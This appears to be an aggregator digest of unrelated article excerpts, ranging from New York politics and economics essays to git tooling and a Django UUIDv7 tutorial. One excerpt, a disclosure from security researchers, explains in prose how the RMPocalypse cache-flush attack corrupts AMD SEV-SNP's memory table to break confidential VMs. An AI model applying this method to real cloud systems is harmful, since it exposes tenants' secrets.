Despite the best efforts of First Deputy Mayor Randy Mastro, the only councilmembers besides Holden who spoke favorably about Ryder's Law were Chris Marte and Eric Bottcher—neither of whom is on the Health Committee, and both of whom had appeared at a New Yorkers for Clean, Livable, and Safe Streets (NYCLASS) rally outside City Hall on Wednesday .

"Look, we're in 2025. If it was a human pushing a horse carriage, we would call that inhumane. If it was any other living animal, whether it was dogs or cats, pushing a carriage, we would call that inhumane," Marte said. "Why do we have to put horses at a different level? That's why I support this bill."

But the Health Committee members who spoke at the meeting all expressed varying degrees of skepticism towards the legislation.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

RMPocalypse Attack: How a Catch-22 Breaks AMD SEV-SNP

Lobsters
rmpocalypse.github.io
2025-11-14 22:24:31
Comments...
Original Article

RMPocalypse: How a Catch-22 Breaks AMD SEV-SNP

How a Catch-22 Breaks AMD SEV-SNP
(ACM CCS 2025)

Learn More

Summary

Confidential computing allows customers to off-load their computation to the cloud without having to trust the cloud provider. One of the approaches to enable confidential computing is by anchoring the trust in the hardware. AMD’s SEV-SNP, one such hardware mechanism, supports confidential computing by creating confidential virtual machines. With RMPocalypse, we demonstrate an attack on all AMD processors that support SEV-SNP (Zen 3/4/5) and compromise all confidential computing guarantees. Reverse Map Table, in short RMP, is one of the main protection mechanisms in SEV-SNP to stop the hypervisor from accessing the confidential virtual machines. In RMPocalypse, we exploit AMD’s incomplete protections that allow us to perform a single memory write to the RMP, thus breaking SEV-SNP.

What is AMD SEV-SNP?

Secure Encrypted Virtualization-Secure Nested Paging, SEV-SNP for short, is AMD’s latest hardware extension to support confidential computing.

What is RMP?

SEV-SNP uses a data structure called Reverse Map Table (RMP) to store security metadata for all DRAM pages in the system. Since RMP can be large in size, it is stored in the DRAM. Now you might ask, who protects the RMP? Well, the RMP! Easier said than done, as this design choice by AMD creates a chicken-and-egg problem. The main challenge lies in the initialization, when the RMP is being set up in the DRAM, there has to be an orthogonal mechanism in place to make sure this is done correctly. Only after a successful initialization can the RMP protect itself (and of course the confidential VMs). AMD has an elegant solution to this problem. They use a security co-processor called the PSP to initialize the RMP. During initialization, platform protection mechanisms configured by the PSP protect the RMP.

What went wrong?

RMPocalypse shows that AMD’s platform protection mechanisms are not complete, thus leaving a small window of opportunity for the attacker to maliciously overwrite the RMP on initialization. Due to the design of the RMP, a single overwrite of 8 bytes within the RMP causes the entire RMP to become subsequently compromised. With a compromised RMP, all integrity guarantees of SEV-SNP become void. RMPocalypse case studies show that an attacker-controlled RMP not only voids the integrity but also results in a full breach of confidentiality.

What can an attacker do with this vulnerability?

We showcase RMPocalypse primitives by forging attestation values, enabling debug, reading and writing arbitrary encrypted CVM memory, and replaying the CVM register state.

Attack Overview

AMD performs an initialization step when the hypervisor wants to enable SEV-SNP on the platform. Setting up the RMP is one of the critical steps in this initialization. Thus, during initialization, AMD blocks all the memory accesses to the memory region that holds the RMP data structure. In particular, AMD uses so-called Trusted Memory Regions (TMRs) to block any access from untrusted components (e.g., x86 cores).

In our analysis of the RMP initialization, we observed that the malicious hypervisor running on the x86 cores can still create dirty cachelines pointing to DRAM. As the TMR barrier only stops the memory access at the memory controller level, it cannot stop cache pollution. Note that this in itself does not compromise SEV-SNP yet, since the RMP is still intact in memory at this point and if the attacker tries to flush the entry, the TMR will block it. It is after the initialization, when AMD lifts the TMR barrier, when we can perform the flush, and the write goes through to the DRAM!

In summary, we identify the root-cause as the misalignment of different memory protection mechanisms on the platform.

High level overview of the RMPocalypse attack during SEV-SNP initialization

Figure (a) shows the main components of our attack with x86 cores and caches connected to the DRAM over an interconnect. During SEV-SNP init, as shown in (b), a malicious hypervisor creates dirty cachelines pointing to RMP memory. Then it lets the PSP setup the RMP per usual and waits for the acknowledgement that the initialization is complete. In particular, after writing to the RMP range the PSP notifies the platform to switch from the TMR protection mechanism and start enforcing SEV-SNP semantics. Concretely, this means that the TMR access checks are lifted and the core starts enforcing RMP checks on memory accesses. However, these RMP checks occur before the memory write gets written to cache. Thus, all data within the cache is assumed to be valid and already complies with the current security semantics. This leaves us with a time window during RMP initialization, where the x86 cores can flush the previously created dirty cacheline entries. They are neither subject to access control checks based on the TMR nor the RMP, thus bypassing both protection mechanisms. As depicted in (c), the malicious hypervisor can use the primitive to get arbitrary unchecked writes to RMP memory.

Attack Complexity

We perform the above RMP corruption during the SEV initialization. RMPocalypse is deterministic since our malicious write always goes through. Next, with our choice of corrupting the root RMP entry with this write, we can tamper with all RMP entries in the system and the logic state they belong to. Our paper explains the detailed analysis of the RMP states. But in short, the RMP write-protects a critical metadata page for CVMs. This page holds security sensitive information, such as debug-enable bit and the attestation hash. With the RMP checks practically disabled, we show how to corrupt these metadata pages to enable debug mode and bypass attestation. With each of these primitives, we can arbitrarily tamper with the execution of the confidential VMs and exfiltrate all secrets with 100% success rate.

Further Information

Read the full academic paper for implementation details.

FAQ

Media Coverage

Authors

Group Logo

Logitech confirms data breach after Clop extortion attack

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 22:18:36
Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July. [...]...
Original Article

Logitech

Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July.

Logitech International S.A. is a Swiss multinational electronics company that sells hardware and software solutions, including computer peripherals, gaming, video collaboration, music, and smart home products.

Today, Logitech filed a Form 8-K with the U.S. Securities and Exchange Commission, confirming that data was stolen in a breach.

Wiz

"Logitech International S.A. ("Logitech") recently experienced a cybersecurity incident relating to the exfiltration of data. The cybersecurity incident has not impacted Logitech's products, business operations or manufacturing," disclosed Logitech.

"Upon detecting the incident, Logitech promptly took steps to investigate and respond to the incident with the assistance of leading external cybersecurity firms."

Logitech says the data likely includes limited information about employees and consumers, as well as data relating to customers and suppliers, but the company does not believe hackers gained access to sensitive information such as national ID numbers or credit card information, as that data was not stored in the breached systems.

Logitech says that the breach occurred through a third-party zero-day vulnerability that was patched as soon as a fix was available.

This statement comes after the Clop extortion gang added Logitech to its data-leak extortion site last week, leaking almost 1.8 TB of data allegedly stolen from the company.

While the company does not name the software vendor, the breach was likely caused by an Oracle zero-day vulnerability exploited by the Clop extortion gang in July data-theft attacks.

Last month, Mandiant and Google began tracking a new extortion campaign in which numerous companies received emails from the Clop ransomware operation claiming that sensitive data had been stolen from their Oracle E-Business Suite systems.

These emails warned that the stolen data would be leaked if a ransom demand was not paid.

Clop extortion email sent to Oracle customers
Clop extortion email sent to Oracle customers

Soon after, Oracle confirmed a new E-Business Suite zero-day , tracked as CVE-2025-61882, and issued an emergency update to fix the flaw.

The Clop extortion gang has a long history of exploiting zero-day flaws in massive data theft attacks, including:

Other organizations impacted by the 2025 Oracle E-Business Suite data theft attacks include Harvard , Envoy Air , and The Washington Post .

BleepingComputer contacted Logitech earlier this month and again today with questions regarding the breach and will update the story if we receive a response.

Wiz

Secrets Security Cheat Sheet: From Sprawl to Control

Whether you're cleaning up old keys or setting guardrails for AI-generated code, this guide helps your team build securely from the start.

Get the cheat sheet and take the guesswork out of secrets management.

SSL Configuration Generator

Hacker News
ssl-config.mozilla.org
2025-11-14 22:15:04
Comments...
Original Article
Mozilla Configuration

Environment

Server Version

OpenSSL Version

Miscellaneous

This also redirects to HTTPS, if possible

30 Days, 9 Cities, 1 Question: Where Did American Prosperity Go?

Hacker News
kyla.substack.com
2025-11-14 21:56:55
Comments...
Original Article

Peter Thiel recently did an interview with the Free Press about his 2020 email to Mark Zuckerberg. The title of the piece is “Capitalism isn’t Working for Young People 1 ”. He has benefited from capitalism more than almost anyone alive. If he admits something has failed, we need to pay attention to it. It echoes something I’ve heard everywhere this year: people feel like the system isn’t working for them anymore. Housing, student debt, AI, trust in institutions - all of it is converging into a very real sense that prosperity has gone missing.

So I spent 30 days on the road to see what prosperity looks like up close. DC, Berkeley, Baltimore, New Hampshire, New York, two cities in Florida, then Prague and Kilkenny, Ireland. The same theme surfaced: people don’t feel the prosperity that’s supposedly surrounding them. They feel the physical friction.

What became clear almost immediately is that the prosperity is real, it’s just not showing up in the places people actually live. It exists in balance sheets, in stock portfolios, in data centers behind chain-link fences. But in daily life like in commutes, in childcare costs, in housing, in safety, in community, people are feeling decay. I kept running into the same contradiction: a wealthy country where everything visible seems to be slowly breaking while everything invisible keeps getting richer.

That tension shows up everywhere, even in the way people talk about politics and culture. Thiel ties the broader culture war to economics - the rise of the groyper, angry young men 2 , as detailed by Rod Dreher , is rooted in the economy. As Rob writes:

I asked one astute Zoomer what the Groypers actually wanted (meaning, what were their demands). He said, “They don’t have any. They just want to tear everything down.” […] The problems are mostly economic and material, in his view (and this is something echoed by other conversations). They don’t have good career prospects, they’ll probably never be able to buy a home, many are heavily indebted with student loans that they were advised by authorities to take out, and the idea that they are likely to marry and start families seems increasingly remote.

I’ve written about the economic situation facing young people before . It does seem like same cluster of things: housing costs and the American Dream, the way social media turns everyone into a comparison engine, and the tech industry’s constant threat that you’re about to be replaced by an AI robot cyborg. Demographic shifts too - Americans aged 70 and older own almost 40% of all stocks in the US and t hose 55 and older own over half of all homes . It’s invisible prosperity and visible decay.

If you’re making decent money but your boss keeps hinting that AI might replace your job, and you can’t afford to buy a house in the city where you work, and the train you take doesn’t run on time (or you’re in 55 minutes of traffic or the bus never shows up or you feel unsafe or without community - you get it), you’re not going to feel prosperous. You’re going to feel like you’re treading water in a system that’s slowly giving up on you.

James Madison called institutional safeguards “auxiliary precautions” - backup systems for when civic virtue failed. But auxiliary systems only work if you can see them - if they’re trusted and functional. What happens when those safeguards themselves become invisible? When wealth compounds in hidden ways, in dark data centers, in algorithmic feeds, while the visible world like housing, transit, safety, community… cracks?

Everywhere I went, people were trying to repair something - sometimes literal infrastructure, sometimes something more abstract like a sense of purpose or a reason to believe the future might accommodate them. This is what I learned.

When I landed in DC, the first thing I saw was the National Guard by Union Station, with their tanks parked in front of marble columns, while a man in a clown costume filmed them. Power as performance, threat as theater, all filmed by the iPhone 17.

I was there for a Brookings conference on AI and work. Senator Chris Murphy opened with a warning about AI psychosis, t he blurring line between real and synthetic life.

On-stage at Brookings

We’ve beta-tested a cognitive experiment on an entire generation without asking for permission: first social media, now AI. An unregulated behavioral test run by private companies at national scale. But there is increasing pushback - the villain in Toy Story 5 is an iPad , and I imagine that’s going to be the beginning of a cultural shift.

There are also ways to reorient this. Tim Wu has a good piece in the NYT on how we can rightsize the very concentrated tech platform-extraction model (Meta makes 10% of its revenue from ads for scams , for example), writing:

An entire generation has grown up thinking that extraction, as opposed to building, is the path to riches […] To recover the sense of optimism and opportunity that once characterized American commerce, Americans need to be confident that — even if they don’t work for a platform — they can reap what they sow.

Ann Manov captures what this extraction economy feels like in a recent piece :

The most humiliating aspect of being alive today, I suppose, is feeling like one is living through a single, unending commercial break. As the human race disintegrates into increasingly atomized particles of recluses and rejects, one can only “stay in touch” through increasingly dystopian social media feeds that consist mostly of ads, whether traditional influencer trash and/or semi-real short-form video.

It shapes how our institutions function too. Yuval Levin argues that Congress is weak because its members want it to be weak (the shutdown is perhaps a lesson in that). They’ve abandoned the actual work of legislating in favor of what he calls “performative outrage for a partisan audience.” A congressional seat now offers a platform for building personal brands through social media engagement and cable news hits.

Success gets measured in invisible metrics like followers and fundraising emails - while the visible work of governance atrophies. It’s the same inversion: institutions optimizing for performance that compounds in attention economies while the actual infrastructure of democracy decays.

Going back to the conference, everyone on my panel agreed that AI isn’t ready for mass adoption, that there has to be some way for the supposed wealth it will generate to be redistributed, especially if it takes all the jobs. But we landed on the same cautious conclusion that AI is indeed a tool. A hammer can hang a picture or break a skull. The difference is intent.

That framing is helpful until you examine it. We don’t market hammers as ‘skull-crusher 1000s’ but AI gets sold explicitly as a job-taker. The CEOs are going on various podcasts and demanding the energy capacity of India 3 as well as likely inevitable government backstops. The difference is who is holding the tool and what they are promising to break.

By the time I got to Berkeley a few days later, I was thinking more and more about Junior Extinction, or the apparent goal of AI to replace entry level jobs. The Berkeley AI conference had all the optimism you’d expect from the Bay Area with bright people genuinely trying to solve hard problems.

I interviewed two people I respect a lot about this, and the conversation kept circling back to the same place: we have to prepare people. Reskilling isn’t enough. The problem is not just jobs, it’s what happens to purpose and meaning when work disappears. If we erase the first step of the ladder, we can’t just tell people to climb harder.

There’s solutions, of course. An interesting paper The Death of the Social Contract and the Enshittification of Jobs explores how we can establish a federal job guarantee that prevents the degradation of work and preserve ‘dignity and purpose’ during a time of immense technological change.

After our talk, someone asked me if we were all falling prey to the Luddite mindset, which is usually shorthand for “backwards technophobe,” but the actual Luddites were more interesting than that. Luddites weren’t anti-technology. They were pro-coevolution with technology. They smashed machines when those machines were used to devalue their labor without improving their lives 4 .

The goal is to make technology something that extends human potential rather than reducing it to nothingness - to create visible prosperity rather than just extracting it.

Baltimore was the next stop, three days of conversations about whether the United States has the collective will to survive the AI era. The mood was less sunny than Berkeley. People kept using the word “bubble” - not quite accusing, more like they were testing whether anyone else would say it first.

The questions became existential very quickly. Could America remain the world’s economic center if it kept isolating itself while China industrialized at hyperspeed ? If military power and economic power are the same thing, are we already losing the war? If we don’t know what we are fighting for (is it really generative AI TikTok slop? or something else?) can we fight at all?

Tracy Alloway recently compared the AI industry to coffee pods , comparing China’s commodification strategy for AI to the US valuing AI like a $5,000 espresso machine while China just gives away the Nespresso pods for free. She points out that the real AI fight is power availability, not the models. Many data centers are sitting empty because they can’t get electricity.

The valuations are wild. The return profile is shaky. China is conquering the renewable age . JP Morgan pointed out in a note recently that every iPhone user would have to pay $34 a month to drive a 10% return on all the various AI investment deployed.

This is invisible prosperity in its purest form, with billions flowing into server farms and data centers that sit empty, waiting for electricity that may never come. Meanwhile, the college graduates who were told to invest in themselves are experiencing very visible decay - working service jobs with degrees they can’t use, debt-laden, watching AI threaten to eliminate even those fallback positions.

I interviewed New York Times labor reporter Noam Scheiber in Baltimore about his forthcoming book Mutiny which tracks the downward mobility of college-educated workers and their turn toward unions. These are people who did everything right - got the degree, took on the debt - but couldn’t get jobs in their fields. So they went to work for Starbucks or REI or Amazon. Now they’re unionizing at rates that would have been unthinkable a decade ago.

Noam’s book (which you should read when it comes out) and our conversation really circled the question of work and its purpose. Support for unions among college graduates sits at 70% . The professional managerial class - supposedly individualistic, supposedly above such concerns - is converging with the working class on populist economic views. Tax the rich. Regulate big business. Protect workers from being replaced by algorithms or outsourced to cheaper labor markets.

Talking with Noam

It’s the inverse of what we’re told about education and upward mobility. The college degree was supposed to be the golden ticket. It hasn’t quite worked. Now those graduates are looking for collective solutions to individual failures that were never really individual at all.

The bubble question lingered. Have we bet everything on vapor? Or are we watching the formation of a political coalition that might actually demand something different?

New Hampshire surprised me. My parents got married there 30 years ago, so they came up from Kentucky to spend a day with me. Then I went to a housing conference.

The problem everyone was trying to solve felt pretty concrete - how do you build when no one wants change? The headline answer is zoning reform, but the real answer involves water systems, sewage expansion, labor shortages, financing costs, and the politics of aging.

New Hampshire is the second-oldest state in the country. The median homeowner is in their late fifties. People can’t afford to leave and people can’t afford to move in. Rising mortgage rates have created what economists call “housing lock-in” - your 3% mortgage is now a golden handcuff.

When people can’t move, neither can labor, families, or fertility. There’s a new study showing that housing costs account for about half the US fertility decline between 2000 and 2020. It’s childcare too - a new paper from Abigail Dow reports that a 10% increase in the price of childcare leads to a 5.7% decrease in the birth rate.

The affordability crisis compounds - without affordable homes, young families don’t form. Without young families, the tax base ages. Without young taxpayers, resources shrink. The system eats itself.

In New Hampshire, people talked openly about trade-offs. They don’t have an income tax, so it relies on property taxes, already among the highest in the country, to fund services. Expanding infrastructure means higher costs somewhere. Hard problems require hard math. But there was this question underneath all of it: how do we grow without losing what feels like home?

New York felt like the opposite of that question. Not “how do we preserve what we have?” but “how do we get to yes?”

I was there for a week or so, which was the longest stop on the trip. Filmed a documentary, shot a commercial, spoke at the Aspen Ideas Conference, joined a NPR debate that felt like being in the eye of a cultural storm (read about that here ). New York is exhausting and alive in equal measure. I think the present moment requires some fight with conviction in values, strength in uncertainty and New York has that in abundance.

Talking at Aspen Ideas Economy

I spoke with Dean Fuleihan a few days ago, who’s about to be first deputy mayor under Mayor-elect Zohran Mamdani ( Semafor has a good write-up on Lina Khan’s role on the transition team). Mamdani’s campaign was built on affordability 5 , on the premise that government can work if people who believe in it actually try. Fuleihan said “New York is not about saying no. It’s about figuring out how to get to yes.”

I won’t overromanticize the city, but New York remembers itself. Maybe that’s because it’s older, or because the architecture forces you to look up. History lives in the buildings here. Being surrounded by old things makes you aware of the responsibility of keeping them standing. This is what visible investment looks like - infrastructure you can see working (at least somewhat) and architecture that reminds you something was built to last. The question is whether the will to maintain exists elsewhere.

Florida felt strange after New York. I drove from Fort Lauderdale to Marco Island to West Palm Beach, and the whole state felt like it was aging and aspiring at the same time. Lovely place.

I spoke at Palm Beach Atlantic, where my first economics professor is now Dean of the business school (he was the person who first told me that economics was an actual major - I owe him a lot!). The students were amazing. Their questions were practical: How do we afford housing? How do we navigate AI? How do we find meaning in work that might not exist in ten years?

With some PBA students

They’re right to worry. Florida is what America could look like demographically within a decade - older, hotter, more expensive, still trying to grow. It is the most rent-burdened state in the country. You can see wealth in West Palm Beach - the waterfront towers, the private clubs , $175 million dollar condos (!) - but it’s tough to see a path toward it.

By the time I landed in Prague, I’d spent three weeks watching Americans argue about whether we could still build anything. Prague answered soundly - yes, we can still build things.

I was there to interview Morgan Housel and give a talk on what I’ve started calling the uncertainty smoothie - AI, geopolitics, demographics, fiscal chaos, all blended into one overwhelming question mark. I was haunted by jet lag the entire trip, so I walked ten miles through the city.

It was so deliberate . Trams that ran on time. Wide sidewalks. Leaf vacuums instead of leaf blowers. Each small choice accumulated into proof that someone thought about how systems should work.

You could feel the economy in public space in trams, bridges, parks, civic buildings. Economists call this “middle-income convergence.” Czechia is catching up to Western Europe in productivity and wages, but it’s still small enough that growth is visible.

Again, in the US, growth happens in spreadsheets and server farms, in data centers behind chain-link fences that hire only 800 people for a $50b investment , on social media apps, in private, gated communities. Our prosperity is increasingly invisible. The result is this strange alienation where people sense the economy is humming somewhere, but not for them.

Economies that invest in visible competence generate trust, and trust is an economic asset. When systems decay, even rising GDP feels hollow. Infrastructure is emotional architecture. When things work, people believe life can too. Maintenance generates trust. Trust compounds.

Ireland was the perfect final stop. My grandparents immigrated from Roscommon and Sligo in the 1950s, went back once, then came back to the States for good. Going there felt important.

I went for Kilkenomics, the world’s best economics festival. Just phenomenal. I joined four panels - a podcast with David McWilliams, one on America’s economy, another on data, and a final one on algorithms.

Graffiti from Ireland

The audience questions were remarkable. “How would Keynes feel about all of this?” “How do we measure crony capitalism?” Everyone was wrestling with the same question that followed me all month: How do you keep a system human?

Inside Kilkenny Castle, I felt the fatigue of the trip catch up with me. The fortress has changed hands through conquest and crisis for nearly a thousand years and now stands open to anyone who wants to walk its halls.

I then climbed the narrow staircase of St. Canice’s Cathedral to the old monks’ tower. It’s been standing since the sixth century, where bells once rang to call monks to prayer. Standing there, I thought about the past month. The tanks and the clown in DC. The engineers in Berkeley. The union organizers in Baltimore. The housing advocates in New Hampshire. The students in Florida. The people in New York. The quiet competence of Prague. Everyone trying to keep something upright, whether it be an economy, a community, a sense of self.

St. Canice is the patron saint of the shipwrecked - of those who have gone through great trial and somehow survived. In a way, the tower itself is the answer to the question I’d been unknowingly chasing all month.

America’s problem isn’t that we lack wealth - we have enormous wealth - it’s that we’ve made our wealth invisible while letting everything visible decay in a way. We’ve inverted the formula.

Northern Ireland’s peace process, as Robert Saldin and Robert Eisinger wrote about succeeded partly because communities deliberately shifted focus from the existential debate between nationalists and unionists to local projects where compromise was possible. It was maintenance. Working together on visible problems created space for former enemies to reconcile themselves to living as neighbors.

When I started crying in that tower, I think it was partly exhaustion. Partly standing in a place my family came from. Partly sadness for what feels so challenging at home. Partly hope that enough people are still trying to rebuild what matters. Partly because I’d spent 30 days watching people try to make prosperity visible again - to build systems you can see, touch, and trust.

Thanks for reading.

Just One Single History

Lobsters
josh-project.github.io
2025-11-14 21:51:07
Comments...
Original Article

Just One Single History

Josh combines the advantages of monorepos with those of multirepos by leveraging a blazingly-fast, incremental, and reversible implementation of git history filtering.

Concept

Traditionally, history filtering has been viewed as an expensive operation that should only be performed to fix issues with a repository, such as purging big binary files or removing accidentally-committed secrets, or as part of a migration to a different repository structure, like switching from multirepo to monorepo (or vice versa).

The implementation shipped with git ( git-filter branch ) is only usable as a once-in-a-lifetime last resort for anything but tiny repositories.

Faster versions of history filtering have been implemented, such as git-filter-repo or the BFG repo cleaner . Those, while much faster, are designed for doing occasional, destructive maintenance tasks, usually with the idea already in mind that once the filtering is complete the old history should be discarded.

The idea behind josh started with two questions:

  1. What if history filtering could be so fast that it can be part of a normal, everyday workflow, running on every single push and fetch without the user even noticing?
  2. What if history filtering was a non-destructive, reversible operation?

Under those two premises a filter operation stops being a maintenance task. It seamlessly relates histories between repos, which can be used by developers and CI systems interchangeably in whatever way is most suitable to the task at hand.

How is this possible?

Filtering history is a highly predictable task: The set of filters that tend to be used for any given repository is limited, such that the input to the filter (a git branch) only gets modified in an incremental way. Thus, by keeping a persistent cache between filter runs, the work needed to re-run a filter on a new commit (and its history) becomes proportional to the number of changes since the last run; The work to filter no longer depends on the total length of the history. Additionally, most filters also do not depend on the size of the trees.

What has long been known to be true for performing merges also applies to history filtering: The more often it is done the less work it takes each time.

To guarantee filters are reversible we have to restrict the kind of filter that can be used; It is not possible to write arbitrary filters using a scripting language like is allowed in other tools. To still be able to cover a wide range of use cases we have introduced a domain-specific language to express more complex filters as a combination of simpler ones. Apart from guaranteeing reversibility, the use of a DSL also enables pre-optimization of filter expressions to minimize both the amount of work to be done to execute the filter as well as the on-disk size of the persistent cache.

From Linus Torvalds 2007 talk at Google about git:

Audience:

Can you have just a part of files pulled out of a repository, not the entire repository?

Linus:

You can export things as tarballs, you can export things as individual files, you can rewrite the whole history to say "I want a new version of that repository that only contains that part", you can do that, it is a fairly expensive operation it's something you would do for example when you import an old repository into a one huge git repository and then you can split it later on to be multiple smaller ones, you can do it, what I am trying to say is that you should generally try to avoid it. It's not that git cannot handle huge projects, git would not perform as well as it would otherwise. And you will have issues that you wish you didn't not have.

So I am skipping this issue and going back to the performance issue. One of the things I want to say about performance is that a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true.

That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.

Kathy Hochul's 'Affordability' Excuse for Building a Gas Pipeline Doesn't Even Make Sense

hellgate
hellgatenyc.com
2025-11-14 21:46:47
The centrist Democrat has gone all-in on setting the climate on fire as crypto-investors, fossil fuel executives, and her own husband cash in....
Original Article
Kathy Hochul's 'Affordability' Excuse for Building a Gas Pipeline Doesn't Even Make Sense
Ravenswood Generating Station in Queens. (Scott Heins / Hell Gate)

Climate

The centrist Democrat has gone all-in on setting the climate on fire as crypto-investors, fossil fuel executives, and her own husband cash in.

Scott's Picks:

Over the past 15 days, Governor Kathy Hochul has: fought the orders of a state judge who said she must enforce the state's climate laws ; announced she was going to delay the implementation of the state's move to all-electric buildings; approved a climate-killing pipeline that will run through New York Harbor from the South Shore of Staten Island to the Rockaways, five years after it was originally denied; and allowed a cryptocurrency outfit to keep running a dirty fossil fuel plant to mine digital currencies.

Why is she doing this? What's the point? According to her office, it's not a "ruining-the-planet" approach, it's an "all-of-the-above approach" in the name of "affordability."

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

How to use UUIDv7 in Python, Django and PostgreSQL

Lobsters
www.paulox.net
2025-11-14 21:21:29
Comments...
Original Article

Learn how to use UUIDv7 today with stable releases of Python 3.14, Django 5.2 and PostgreSQL 18. A step by step guide showing how to generate UUIDv7 in Python, store them in Django models, use PostgreSQL native functions and build time ordered primary keys without writing SQL.

© 2025 Paolo Melchiorre CC BY-SA “Torre di Cerrano framed by the coastal maritime pine woods in Pineto, Italy.”
© 2025 Paolo Melchiorre CC BY-SA “Torre di Cerrano framed by the coastal maritime pine woods in Pineto, Italy.”

Introduction

UUIDv7 is finally available in the entire Python Django PostgreSQL stack. It provides time ordering, better index locality and easier reasoning about data creation compared to UUIDv4. All of this can be used today with stable versions and without custom extensions.

In this article I walk through a practical example showing how UUIDv7 works in Python first and then in PostgreSQL using Django ORM and migrations only. No manual SQL is needed and every step shows real code and migration output.

What is a UUID

A UUID is a 128 bit identifier that aims to be globally unique without coordination. It works well in distributed systems because it removes the need for a central sequence generator. This makes UUIDs ideal for many modern architectures.

The most common version is UUIDv4 which is fully random. UUIDv7 improves on this by adding a timestamp prefix that makes identifiers sort in creation order. This helps index locality and makes inserts more efficient.

UUIDv4 vs UUIDv7

UUIDv4

  • Fully random
  • Very good uniqueness
  • Poor index locality in large tables
  • Inserts become random writes
  • Hard to infer creation time

UUIDv7

  • Timestamp based and time ordered
  • Better index locality and more predictable writes
  • Creation time can be extracted directly
  • Suitable as a primary key in high write environments

Why ordering matters

Because a UUIDv7 begins with a timestamp, new values follow a natural ordering. Database indexes work better with ordered inserts since they reduce fragmentation and avoid many of the random writes caused by UUIDv4.

UUIDv7 is a strong alternative to traditional auto incrementing integer IDs in new Django projects because it combines global uniqueness with predictable ordering. While integers are simple and efficient, they require coordination across services and can complicate sharding or offline workflows. UUIDv7 keeps inserts sequential enough for good index locality while avoiding the bottlenecks of a central sequence. This makes it a practical default identifier for modern architectures where horizontal scaling or distributed processing are likely to appear later.

Preparing the environment

Python 3.14 is assumed to be available. The first step is creating a virtual environment and installing Django and Black, which will prepare the project structure and dependencies needed for the tutorial.

Creating the virtual environment

This step creates a clean virtual environment with Python 3.14 and installs the tools needed to start the Django project.

$ python3.14 -m venv .venv
$ source .venv/bin/activate
$ python -m pip install django black

Creating a Django project and the first UUIDv7 model

The next step is creating the Django project and application that will contain the model used in the UUIDv7 example.

Creating the Django project and application

Here we start a new Django project named uuidv7 and add an items app that will contain the models used in the examples.

$ python -m django startproject uuidv7
$ tree --noreport uuidv7/
uuidv7/
├── manage.py
└── uuidv7
    ├── asgi.py
    ├── __init__.py
    ├── settings.py
    ├── urls.py
    └── wsgi.py
$ cd uuidv7
$ python -m django startapp items
$ tree --noreport items/
items/
├── admin.py
├── apps.py
├── __init__.py
├── migrations
│   └── __init__.py
├── models.py
├── tests.py
└── views.py

Enable the app in settings:

INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "items",
]

Creating the Item model using Python uuid.uuid7

This model uses Python 3.14 builtin uuid.uuid7 for primary key generation and adds a cached_property to extract the timestamp from the UUID . It demonstrates client side UUIDv7 usage without depending on the database.

import uuid
from datetime import datetime

from django.db import models
from django.utils.functional import cached_property


class Item(models.Model):
    uuid = models.UUIDField(default=uuid.uuid7, primary_key=True)

    @cached_property
    def creation_time(self):
        return datetime.fromtimestamp(self.uuid.time / 1000)

Creating the initial migration

This section generates the migration file that defines the database table for the Item model. The migration uses SQLite as the default backend and produces a straightforward schema containing only the UUID column.

$ python -m manage makemigrations
Migrations for 'items':
  items/migrations/0001_initial.py
    + Create model Item

Inspecting the SQL for SQLite

This command shows the SQL that Django will run on SQLite, making it easier to understand how the Item model is represented in the database.

$ python -m manage sqlmigrate items 0001
BEGIN;
--
-- Create model Item
--
CREATE TABLE "items_item" (
    "uuid" char(32) NOT NULL PRIMARY KEY
);
COMMIT;

Applying the migration

Now we apply the migration so the Item table is created in the local SQLite development database.

$ python -m manage migrate items 0001
Operations to perform:
  Target specific migration: 0001_initial, from items
Running migrations:
  Applying items.0001_initial... OK

Testing the Item model in Django shell

This example creates an Item instance and reads the timestamp encoded in its UUIDv7 value.

>>> item = Item()
>>> item.creation_time.isoformat()
'2025-11-14T16:52:55.879000'

Using UUIDv7 in PostgreSQL 18 with Django 5.2

PostgreSQL 18 adds native support for UUIDv7 and timestamp extraction, making it possible to generate the UUID directly in the database. This section shows how to configure Django to use PostgreSQL and how to create models that rely on these functions.

Installing psycopg

We install psycopg, the PostgreSQL driver used by Django, so the project can connect to a PostgreSQL 18 database.

$ python -m pip install psycopg[binary]

Configuring PostgreSQL in settings.py

The database configuration is updated to point Django to a PostgreSQL 18 instance instead of SQLite.

DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "HOST": "postgres",
        "NAME": "uuidv7",
        "PASSWORD": "postgres",
        "PORT": "5432",
        "USER": "postgres",
    }
}

Creating the Record model with PostgreSQL generated UUIDv7

The following model uses Django db_default to call the uuidv7 function directly inside PostgreSQL. It results in the UUID being generated in the database during the insert operation.

Defining a Django database function for uuidv7

This Django function wrapper maps directly to PostgreSQL’s uuidv7 function so it can be used in model definitions.

class UUIDv7(models.Func):
    function = 'uuidv7'
    output_field = models.UUIDField()

Creating the Record model

The Record model uses PostgreSQL uuidv7 to generate the primary key at insert time.

class Record(models.Model):
    uuid = models.UUIDField(db_default=UUIDv7(), primary_key=True)

Creating the migration for the Record model

We create the migration that defines the database table storing UUIDv7 values generated by PostgreSQL.

$ python -m manage makemigrations
Migrations for 'items':
  items/migrations/0002_record.py
    + Create model Record

Inspecting the migration SQL for PostgreSQL

This command shows the SQL generated by Django for the Record model when using PostgreSQL.

$ python -m manage sqlmigrate items 0002
BEGIN;
--
-- Create model Record
--
CREATE TABLE "items_record" (
    "uuid" uuid DEFAULT (uuidv7()) NOT NULL PRIMARY KEY
);
COMMIT;

Applying the migration

Applying this migration creates the items_record table in PostgreSQL using the uuidv7 default.

$ python -m manage migrate items 0002
Operations to perform:
